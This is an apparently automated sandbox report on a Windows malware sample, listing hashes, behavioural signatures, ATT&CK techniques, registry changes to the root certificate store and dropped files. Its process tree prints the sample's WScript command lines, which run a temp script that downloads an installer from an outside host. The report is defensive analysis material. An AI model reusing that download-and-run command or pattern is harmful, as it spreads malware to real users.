abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53

General

Target

abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe
Size

184KB
MD5

8f31ecfc1b23b82860635320315e2f8c
SHA1

c9c05a28e3c545a9d0baaff3b0ec8056d3948161
SHA256

abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53
SHA512

13cf4b4af1ce1dd7f4f0ca60e9cba922915a01bed0d36e8362db34336a646a4c3e6df4d9f19102ce4ea55fa949e4c0320c15c40597794b7c365a201832e2ae73
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO32W:/7BSH8zUB+nGESaaRvoB7FJNndne

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 14 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
2	1704	WScript.exe
5	1704	WScript.exe
9	1704	WScript.exe
13	1704	WScript.exe
14	1704	WScript.exe
16	1564	WScript.exe
18	1564	WScript.exe
20	1564	WScript.exe
22	1564	WScript.exe
24	1564	WScript.exe
26	1564	WScript.exe
27	1664	WScript.exe
29	1664	WScript.exe
30	1776	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe

description	pid	process	target process
PID 1760 wrote to memory of 1704	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1704	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1704	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1704	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1564	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1564	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1564	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1564	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1664	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1664	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1664	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1664	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1776	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1776	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1776	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe
PID 1760 wrote to memory of 1776	1760	abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe
"C:\Users\Admin\AppData\Local\Temp\abe7944835620766743334364605fcfabd35d2d3802975fc59a1307a8a871f53.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C0.js" http://www.djapp.info/?domain=wPyKXEDXvf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C0.exe
2⤵
- Blocklisted process makes network request
PID:1704

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C0.js" http://www.djapp.info/?domain=wPyKXEDXvf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C0.exe
2⤵
- Blocklisted process makes network request
- Modifies system certificate store
PID:1564

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C0.js" http://www.djapp.info/?domain=wPyKXEDXvf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C0.exe
2⤵
- Blocklisted process makes network request
PID:1664

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C0.js" http://www.djapp.info/?domain=wPyKXEDXvf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C0.exe
2⤵
- Blocklisted process makes network request
PID:1776

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fuf2C0.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0I5TMJHY.txt

Filesize
100B

MD5
85f3116abae1ec69575c117efc455f48

SHA1
338d81f3dd06243b77794cea9e4b01926b446780

SHA256
066c6c552f8e4c2db31834ba5e66aa55bdbfdfa5edd77bc1739dd279e04e9064

SHA512
751010f31f2137ae6c99f543fe27f87b0e1920455233ad81530151d26094a40731a955042930869c7943daf916370171648b0bf664b1cb26016b4bd57b70f060

Download Submit
memory/1564-58-0x0000000000000000-mapping.dmp

Download
memory/1664-61-0x0000000000000000-mapping.dmp

Download
memory/1704-55-0x0000000000000000-mapping.dmp

Download
memory/1760-54-0x0000000076191000-0x0000000076193000-memory.dmp

Filesize
8KB

Download
memory/1776-63-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads